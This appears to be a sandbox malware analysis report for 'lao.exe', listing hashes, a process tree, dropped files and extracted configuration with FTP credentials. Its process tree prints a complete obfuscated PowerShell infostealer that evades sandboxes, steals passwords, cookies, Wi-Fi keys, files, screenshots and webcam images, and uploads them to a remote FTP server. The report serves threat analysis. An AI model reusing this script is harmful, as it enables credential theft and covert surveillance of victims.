Overview

overview

10

Static

static

3

lao.exe

windows7-x64

7

lao.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/05/2023, 12:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lao.exe

  • Size

    7.2MB

  • MD5

    9e55cd6766fae8a83935817092c82797

  • SHA1

    3e0c8d5b8870c581f95200ef6c3ff8986ddb5cba

  • SHA256

    217b6268e7eb4be59b275d8c0c695a28d747fff6c79098e651eb27f81c44a02f

  • SHA512

    8ca1dc0abed46e49d1da3b7f676e8704d142323d37eb1e3d439ea6dbb4091b6364a43a3e1496d9bc9356345724acdd02a922161c5d433f66afa197df67345dae

  • SSDEEP

    196608:dVDGXVFICteErowCzlxZV3Gu5D4S26/CS3r9Lc3GpbN4s:TOInEro/14S26LKWpas

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://evilextractor.com/wp-content/uploads/2022/12/Python39-322.zip
exe.dropper

https://github.com/tedburke/CommandCam/archive/refs/heads/master.zip

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    145.14.151.60
  • Port:
    21
  • Username:
    u655548578
  • Password:
    Supreme81

Signatures

  • Blocklisted process makes network request 19 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\lao.exe
    "C:\Users\Admin\AppData\Local\Temp\lao.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Users\Admin\AppData\Local\Temp\lao.exe
      "C:\Users\Admin\AppData\Local\Temp\lao.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "$IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model;$IsVirtual"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3008
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20762\satan.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:236
        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\satan.exe
          C:\Users\Admin\AppData\Local\Temp\_MEI20762\satan.exe
          4⤵
          • Executes dropped EXE
          PID:4088
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass "$startdate=(Get-Date 2022-11-09).toString(\"yyyy-M-dd\") $enddate=(Get-Date 2024-1-05).toString(\"yyyy-M-dd\") $today=Get-Date -format yyyy-M-dd if($today -ge $startdate -and $today -le $enddate){ $ProgressPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $new_line= \"A\"+\"d\"+\"d\"+\"-\"+\"M\"+\"p\"+\"P\"+\"r\"+\"e\"+\"f\"+\"e\"+\"r\"+\"e\"+\"n\"+\"c\"+\"e\"+\" -E\"+\"x\"+\"c\"+\"l\"+\"u\"+\"s\"+\"i\"+\"o\"+\"n\"+\"P\"+\"a\"+\"t\"+\"h\";$last_line=\"$pwd\".SubString(0,3);Invoke-Expression \"$new_line $last_line -Force\" $IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model if ($IsVirtual -eq 'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x'){ exit }elseif($IsVirtual -eq 'V'+'M'+'W'+'a'+'r'+'e') { exit }elseif($IsVirtual -eq 'H'+'y'+'p'+'e'+'r'+'-'+'V') { exit }else { cd \"$($env:APPDATA)\" $1=\"1\";$2=\"2\";$3=\"3\";$4=\"4\";$5=\"5\";$6=\"6\";$7=\"7\" $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation ; $whoami=hostname;mkdir \"Cred\($hey)$whoami\$1-Password-Cookies\";mkdir \"Cred\($hey)$whoami\$7-Files\";mkdir \"Cred\($hey)$whoami\$2-wifi\";mkdir \"Cred\($hey)$whoami\$3-sysinfo\";mkdir \"Cred\($hey)$whoami\$4-mac\";mkdir \"Cred\($hey)$whoami\$5-history\";mkdir \"Cred\($hey)$whoami\$6-PublicIP\" (Invoke-WebRequest -uri \"http://ifconfig.me/ip\").Content | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$6-PublicIP\publicIP.txt\" Get-ComputerInfo | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$3-sysinfo\sys-info.txt\" ipconfig /all | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$4-mac\mac.txt\" $UserName = \"$env:USERNAME\" $Path = \"$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History\" $Regex = \"(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?\" $Value = Get-Content -Path \"$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History\"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$5-history\chrome_history.txt\" $UserName = \"$env:USERNAME\" $Path = \"$Env:systemdrive\Users\$UserName\AppData\Local\Microsoft\Edge\User Data\Default\History\" $Regex = \"(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?\" $Value = Get-Content -Path \"$Env:systemdrive\Users\$UserName\AppData\Local\Microsoft\Edge\User Data\Default\History\"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$5-history\edge_history.txt\" (netsh wlan show profiles) | Select-String \"\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File -FilePath \"$env:APPDATA\Cred\($hey)$whoami\$2-wifi\extracted_wifi.txt\" cd \"$env:LOCALAPPDATA\";mkdir Programs;cd Programs;mkdir Python $47EHDME84D4pzzHDEM7z4 = New-Object System.Net.WebClient $47EHDME84D4pzzHDEM7z4.DownloadFile(\"https://evilextractor.com/wp-content/uploads/2022/12/Python39-322.zip\",\"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\" \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /shtml cookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content cookies.html | Select-Object -Skip 5 | Out-File chrome_cookies.html $cookie_p = 'chrome_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_p -Raw) | Set-Content $cookie_p Copy-Item -Path \"chrome_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\chrome_cookies.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\mzcv_32.exe /shtml cookies_32-bit.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content cookies_32-bit.html | Select-Object -Skip 4 | Out-File mozilla_cookies_32-bit.html $m_32_cookie_p = 'mozilla_cookies_32-bit.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $m_32_cookie_p -Raw) | Set-Content $m_32_cookie_p Copy-Item -Path \"mozilla_cookies_32-bit.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\mozilla_cookies_32-bit.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\mzcv_64.exe /shtml cookies_64-bit.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content cookies_64-bit.html | Select-Object -Skip 4 | Out-File mozilla_cookies_64-bit.html $m_64_cookie_p = 'mozilla_cookies_64-bit.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $m_64_cookie_p -Raw) | Set-Content $m_64_cookie_p Copy-Item -Path \"mozilla_cookies_64-bit.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\mozilla_cookies_64-bit.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /CookiesFile \"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Network\Cookies\" /shtml edgcookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content edgcookies.html | Select-Object -Skip 5 | Out-File edge_cookies.html $cookie_edg = 'edge_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_edg -Raw) | Set-Content $cookie_edg Copy-Item -Path \"edge_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\edge_cookies.html\" $mission_find=Get-ChildItem \"$env:APPDATA\Opera Software\Opera Stable\" -Filter \"Cookies\" -Recurse | % { $_.FullName } cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /CookiesFile \"$mission_find\" /shtml oprcookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content oprcookies.html | Select-Object -Skip 5 | Out-File opera_cookies.html $cookie_opr = 'opera_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_opr -Raw) | Set-Content $cookie_opr Copy-Item -Path \"opera_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\opera_cookies.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\python.exe soax.py browsers | Out-File not_browser_passwords.txt Get-Content not_browser_passwords.txt | Select-Object -Skip 14 | Select-Object -SkipLast 4 | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\Browser_passwords.txt\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\python.exe soax.py mails | Out-File not_mail_passwords.txt Get-Content not_mail_passwords.txt | Select-Object -Skip 14 | Select-Object -SkipLast 4 | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\Mail_passwords.txt\" cd \"$($env:APPDATA)\";$hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname;mkdir \"Cred\($hey)$whoami\$7-Files\Desktop\";mkdir \"Cred\($hey)$whoami\$7-Files\Downloads\" Get-Childitem \"$($env:USERPROFILE)\Desktop\\\" -Recurse -Include \"*.jpg\", \"*.png\", \"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$7-Files\Desktop\" -Force Get-Childitem \"$($env:USERPROFILE)\Downloads\\\" -Recurse -Include \"*.jpg\", \"*.png\", \"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$7-Files\Downloads\" -Force $MH8Y4np7DcMYQVzHE = 'ftp://145.14.151.60/' $HHDME47Ez48zzzpEHn = 'u655548578' $8Ez7EHnMD4p4HnHz7zE = 'Supreme81' $E7DH8E47MHEzM4pEDzED = \"$($env:APPDATA)\Cred\\\" $47EHDME84D4pzzHDEM7z4.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE) $SrcEntries = Get-ChildItem $E7DH8E47MHEzM4pEDzED -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $zz74D4HE4D4EHEEEHEE4MH44 = $E7DH8E47MHEzM4pEDzED -replace '\\','\\' -replace '\:','\:' $pMH4EHpH4H4zDEEE474zMEM = $folder.Fullname -replace $zz74D4HE4D4EHEEEHEE4MH44,$MH8Y4np7DcMYQVzHE $pMH4EHpH4H4zDEEE474zMEM = $pMH4EHpH4H4zDEEE474zMEM -replace '\\', '/' try { $D4EE4DD4HDHz7HzD4EE444zEz = [System.Net.WebRequest]::Create($pMH4EHpH4H4zDEEE474zMEM); $D4EE4DD4HDHz7HzD4EE444zEz.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE); $D4EE4DD4HDHz7HzD4EE444zEz.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $D4EE4DD4HDHz7HzD4EE444zEz.GetResponse(); } catch [Net.WebException] { try { $p4Ep44EzzzHz47HME4EHED = [System.Net.WebRequest]::Create($pMH4EHpH4H4zDEEE474zMEM); $p4Ep44EzzzHz47HME4EHED.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE); $p4Ep44EzzzHz47HME4EHED.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $p4Ep44EzzzHz47HME4EHED.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $E7DH8E47MHEzM4pEDzED -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace $SrcFilePath,$MH8Y4np7DcMYQVzHE $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $47EHDME84D4pzzHDEM7z4.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Recurse -Force DEL \"$($env:APPDATA)\Cred\" -Force -Recurse DEL \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\*\" -Force -Recurse DEL \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\" -Force -Recurse cd \"$($env:APPDATA)\";mkdir \"Ss\($hey)$whoami\Ss\" $47EHDME84D4pzzHDEM7z4.DownloadFile(\"https://github.com/tedburke/CommandCam/archive/refs/heads/master.zip\",\"$($env:APPDATA)\master.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip \"$($env:APPDATA)\master.zip\" \"$($env:APPDATA)\log_d_information_889176\" Start-Sleep -Seconds 12 while ($true) { [Reflection.Assembly]::LoadWithPartialName(\"S\"+\"y\"+\"s\"+\"t\"+\"e\"+\"m\"+\".\"+\"D\"+\"r\"+\"a\"+\"w\"+\"i\"+\"n\"+\"g\") function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose() } $count_web = (1+ $count_web).ToString('00') $count_sc = (1+ $count_sc).ToString('00') $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080) Start-Sleep -Seconds 600 screenshot $bounds \"$($env:APPDATA)\Ss\($hey)$whoami\Ss\screenshot$count_sc.png\" cd \"$($env:APPDATA)\log_d_information_889176\CommandCam-master\";.\CommandCam.exe /delay 50 /filename \"$env:APPDATA\Ss\($hey)$whoami\Ss\webcam$count_web.bmp\" $MH8Y4np7DcMYQVzHE = 'ftp://145.14.151.60/' $HHDME47Ez48zzzpEHn = 'u655548578' $8Ez7EHnMD4p4HnHz7zE = 'Supreme81' $E7DH8E47MHEzM4pEDzED = \"$($env:APPDATA)\Ss\\\" $47EHDME84D4pzzHDEM7z4.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE) $SrcEntries = Get-ChildItem $E7DH8E47MHEzM4pEDzED -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $zz74D4HE4D4EHEEEHEE4MH44 = $E7DH8E47MHEzM4pEDzED -replace '\\','\\' -replace '\:','\:' $pMH4EHpH4H4zDEEE474zMEM = $folder.Fullname -replace $zz74D4HE4D4EHEEEHEE4MH44,$MH8Y4np7DcMYQVzHE $pMH4EHpH4H4zDEEE474zMEM = $pMH4EHpH4H4zDEEE474zMEM -replace '\\', '/' try { $D4EE4DD4HDHz7HzD4EE444zEz = [System.Net.WebRequest]::Create($pMH4EHpH4H4zDEEE474zMEM); $D4EE4DD4HDHz7HzD4EE444zEz.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE); $D4EE4DD4HDHz7HzD4EE444zEz.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $D4EE4DD4HDHz7HzD4EE444zEz.GetResponse(); } catch [Net.WebException] { try { $p4Ep44EzzzHz47HME4EHED = [System.Net.WebRequest]::Create($pMH4EHpH4H4zDEEE474zMEM); $p4Ep44EzzzHz47HME4EHED.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE); $p4Ep44EzzzHz47HME4EHED.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $p4Ep44EzzzHz47HME4EHED.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $E7DH8E47MHEzM4pEDzED -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace $SrcFilePath,$MH8Y4np7DcMYQVzHE $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $47EHDME84D4pzzHDEM7z4.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse DEL \"$env:APPDATA\Ss\($hey)$whoami\Ss\*\" -Force -Recurse DEL \"$env:APPDATA\master.zip\" -Force -Recurse } } }else{ DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse exit } "
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:224
        • C:\Windows\system32\HOSTNAME.EXE
          "C:\Windows\system32\HOSTNAME.EXE"
          4⤵
            PID:1944
          • C:\Windows\system32\ipconfig.exe
            "C:\Windows\system32\ipconfig.exe" /all
            4⤵
            • Gathers network information
            PID:2100
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" wlan show profiles
            4⤵
              PID:4144
            • C:\Windows\system32\HOSTNAME.EXE
              "C:\Windows\system32\HOSTNAME.EXE"
              4⤵
                PID:4800

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          3bfc414667e1ebc31e9259fa1db290fa

          SHA1

          9bff989429779efef334e5524a362e7b6ff266cb

          SHA256

          b58f994c644f7b4a831e889630bfd7ca0860aeb1e0920dc0f5d4928585a9dbab

          SHA512

          e6cb000e8f900132f7dc661f943b8e91e945d171157ff3289b91e9d79f70230e363ed65b7ec97f451b376cf4706a14de9a86193e72dcea8fe3aa8c86c6117d13

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          e7ad0f405ecb510e88bbad9f5e706008

          SHA1

          c5c2085ffa6b519b6e150e1d24ed6162f75bd70b

          SHA256

          02102e7d473d23234d9e23f78a7e1805f22bd7eab2d8f815771af013cbe36403

          SHA512

          0871e24bfcd9b81fa174d440b79ce1a54dd117cd9ccd9f749dc24154412505a6516b91278e4686611ac0525c2fe6b6a3e0bd5a87c8511eb4ccf8c67d1069f5ec

          Download Submit

        • C:\Users\Admin\AppData\Local\Programs\chrome_cookies.html
          Filesize

          72B

          MD5

          1cac3ebd3356882e4d05fb647291ebea

          SHA1

          77b75832e15ce1c2adc4411e5f12db1b630a0ca8

          SHA256

          facc1403e926c510a6b113493c4dfa677b4298edc5829930337987344dc29ccf

          SHA512

          9ff9fae4f3a7b4c7c034036c342dce9a2ea5c94258846a48466e665e1fe6f80150e7fc829e9f0958ebc3e320a8affc0db39bb048b2741359a506cad587dbad43

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\VCRUNTIME140.dll
          Filesize

          94KB

          MD5

          11d9ac94e8cb17bd23dea89f8e757f18

          SHA1

          d4fb80a512486821ad320c4fd67abcae63005158

          SHA256

          e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

          SHA512

          aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\VCRUNTIME140.dll
          Filesize

          94KB

          MD5

          11d9ac94e8cb17bd23dea89f8e757f18

          SHA1

          d4fb80a512486821ad320c4fd67abcae63005158

          SHA256

          e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

          SHA512

          aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\base_library.zip
          Filesize

          1.0MB

          MD5

          3cca79d74f75954ba6bd1db071cfc385

          SHA1

          a8d2fdc1e310e4ed8eb8b396b298da13d4aa623c

          SHA256

          114aa2f3c6fcef8f877e1b1e36965ff48d5d880c8fce336b3fac652699dda1e6

          SHA512

          27b2f6c9d70b43cfb0a0b3ed139187f6fca9d0fd5a1a37b578506edafd883fd9384a925a5261ca144a8bcb5c43d74232ec9bbb85dc5ff230b5d7b99630cc326a

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\python310.dll
          Filesize

          4.2MB

          MD5

          384349987b60775d6fc3a6d202c3e1bd

          SHA1

          701cb80c55f859ad4a31c53aa744a00d61e467e5

          SHA256

          f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

          SHA512

          6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\python310.dll
          Filesize

          4.2MB

          MD5

          384349987b60775d6fc3a6d202c3e1bd

          SHA1

          701cb80c55f859ad4a31c53aa744a00d61e467e5

          SHA256

          f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

          SHA512

          6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\satan.exe
          Filesize

          1.5MB

          MD5

          a6a0f7c173094f8dafef996157751ecf

          SHA1

          c0dcae7c4c80be25661d22400466b4ea074fc580

          SHA256

          b055fee85472921575071464a97a79540e489c1c3a14b9bdfbdbab60e17f36e4

          SHA512

          965d43f06d104bf6707513c459f18aaf8b049f4a043643d720b184ed9f1bb6c929309c51c3991d5aaff7b9d87031a7248ee3274896521abe955d0e49f901ac94

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_joqqj3fw.hbb.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/224-185-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/224-186-0x000001827ABC0000-0x000001827B366000-memory.dmp

          Filesize

          7.6MB

          Download

        • memory/224-196-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/224-195-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/224-194-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/224-182-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/224-183-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/224-184-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/224-193-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/224-192-0x000001827A8F0000-0x000001827A902000-memory.dmp

          Filesize

          72KB

          Download

        • memory/224-191-0x000001827A4B0000-0x000001827A4BA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3008-166-0x0000016A48580000-0x0000016A485A4000-memory.dmp

          Filesize

          144KB

          Download

        • memory/3008-162-0x0000016A2F5A0000-0x0000016A2F5B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3008-163-0x0000016A2F5A0000-0x0000016A2F5B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3008-164-0x0000016A2F5A0000-0x0000016A2F5B0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3008-165-0x0000016A48580000-0x0000016A485AA000-memory.dmp

          Filesize

          168KB

          Download

        • memory/3008-157-0x0000016A2F760000-0x0000016A2F782000-memory.dmp

          Filesize

          136KB

          Download